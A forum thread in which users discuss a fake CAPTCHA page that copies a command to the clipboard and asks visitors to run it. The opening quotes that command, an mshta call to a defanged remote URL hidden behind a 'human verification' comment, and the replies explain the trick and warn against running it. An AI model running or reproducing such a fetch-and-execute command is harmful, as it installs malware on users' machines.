The text it wants me to run is the following:
mshta https://check/[dot]dasoc[dot]icu/gkcxv[dot]google?i=888x8x8x-x8xx-8888-xxx8-a00888888a1ab # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 552163’’
Looks like the site got hacked and wants be run malware, but I’ve never seen something like this before.
That looks like the site got hacked and wants you to run malware.
Also, you might want to edit the link to change the
.s in the URL to[]so it doesn’t linkify a likely malware link for other users.I figured. That’s why I didn’t run it.
Not sure if you saw my edit since it was after you replied, but you might want to edit the post to change the
.'s in the URL to[]so it doesn’t linkify a likely malware link for other users.Done. I also changed the numbers before, but then I didn’t verify that I broke the link.
Probably just an identifier for tracking who ran it.
Nope it is definately malware. It put a command in your clipboard since websites can do this, and then asks you to open a command window to run the command. This command can easily cause you to get and remotely execute an executable. Because this is so obviously dangerous no legit site would ask you to do this.
I was referring to the ?i=number part, just like google uses si for YouTube.
Yeah, doesn’t mshta run JavaScript locally on Windows? This looks like a way to force you to run their script
I hope that URL isn’t the real one, you don’t want anyone trying it just to see what would happen
I’m curious what the script does, I’d love to reverse engineer it but don’t want to risk accidentally executing anything. Anyone with a disposable VM care to take the risk?
Possibly.
BTW, certain malware may be able to break out of a VM.
On the other, some malware may recognize that it is being run in a VM and do absolutely nothing to avoid analysis.I’m sure proper malware analysts have dedicated non-virtual machines they can just format between tests.
Now I wonder if there are motherboards with easily re-flashable firmware (from a read-only device that couldn’t be tampered with).
mshta
I have no idea how somebody might come up with this braindead, unintuitive and irreproducable mnemonic for a JavaScript interpreter but it sounds very much like something Microsoft would do.
I do strongly encourage everyone to go back to pen and paper.
sort of /s but also sort of not /s
DO NOT FOLLOW THESE PROMPTS. This is a malicious prompt. It places malicious content in your clipboard, and requesting that you paste it into command prompt or powershell, which will infect you.
I know, but I like having the hackers on my computer, I just like the Idea that someone is paying attention to me and likes the same thing I do.
You’re making the local FBI field office jealous. Lol
That’s definitely trying to hack you.
From the instructions, I would say they are trying to convince them to hack themselves (and yes, I know, that’s how 95% of hacking works… But is that only me, or this one is so obvious that it hurts?)
It’s not only you, but it definitely would fly over the heads of 95% of my co-workers.
It checks if you’re both human AND not a bumbling tumbleweed.
“A way out west there was this fella, fella I want to tell you about, fella by the name of Jeff Lebowski. At least, that was the handle his lovin’ parents gave him, but he never had much use for it himself. This Lebowski, he called himself the Dude. Now, Dude, that’s a name no one would self-apply where I come from. But then, there was a lot about the Dude that didn’t make a whole lot of sense to me. And a lot about where he lived, like-wise. But then again, maybe that’s why I found the place s’durned innarestin’.”
Highly sophisticated Darwinian CAPTCHA
deleted by creator
I did, it was that link.
And then I posted it here.
I realized and deleted it. You caught me!
The “This is either phishing or a prank, in either case, fucking don’t” type Captcha
Meanwhile me on linux be like :
Nice trick to feed your computer with a virus.
DONT DO IT. Hahahhahah
It absolutely is malware. The Text you see is a comment appended to the end of a command that’ll download malicious software. The comment is placed in such a way that the command is out of frame.
Since I use a Mac, I don’t get this joke.
Does something malicious on windows. They can also do something similar by detecting your os and making you run the mac or linux alternative.
It’s called the ‘John Hammond attack’. Even though it existed before he added his 2 cents, what you see in your image is his addition.
Watch his video to see him explain it.
Well, if it was a Richard Hammond attack, it would probably crash itself.
And have it’s teeth whitened
aye!!! man of culture
At 200mph
HAMMOND YOU BLITHERING IDIOT!
before he added his 2 cents
He spared no expense, huh.
Definitely malware, as everyone has already said.
